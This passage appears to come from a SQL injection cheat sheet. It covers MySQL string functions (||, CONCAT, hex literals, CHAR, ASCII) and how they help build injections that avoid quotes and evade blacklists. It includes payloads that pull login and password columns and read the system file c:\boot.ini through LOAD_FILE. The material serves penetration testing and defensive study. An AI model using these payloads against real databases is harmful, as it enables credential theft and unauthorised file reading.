String related operations can be quite useful to build up injections which are not using any quotes, bypass any other black listing or determine back end database.
|| SELECT login || '-' || password FROM members
NOTE: About MySQL “||”
If MySQL is running in ANSI mode it's going to work but otherwise MySQL accepts it as a `logical operator` and will return 0.
A better way to do it is using CONCAT() function in MySQL:
CONCAT(str1, str2, str3, ...) (M) /* Concatenate supplied strings. */ SELECT CONCAT(login, password) FROM members
These are some direct ways to using strings but it's always possible to use CHAR() to generate string without quotes.
0x457578 /* Hex Representation of string. */ SELECT 0x457578 /* This will be selected as string in MySQL.*/
In MySQL easy way to generate hex representations of strings use this;
SELECT CONCAT('0x',HEX('c:\\boot.ini')) SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) /* This will return 'KLM'. */
Hex based SQL Injection Samples
SELECT LOAD_FILE(0x633A5C626F6F742E696E69) /* This will show the content of c:\boot.ini */
Return ASCII character value of leftmost character.
ASCII() SELECT ASCII('a')
A must have function for Blind SQL Injections.
Convert an integer of ASCII.
CHAR() SELECT CHAR(64)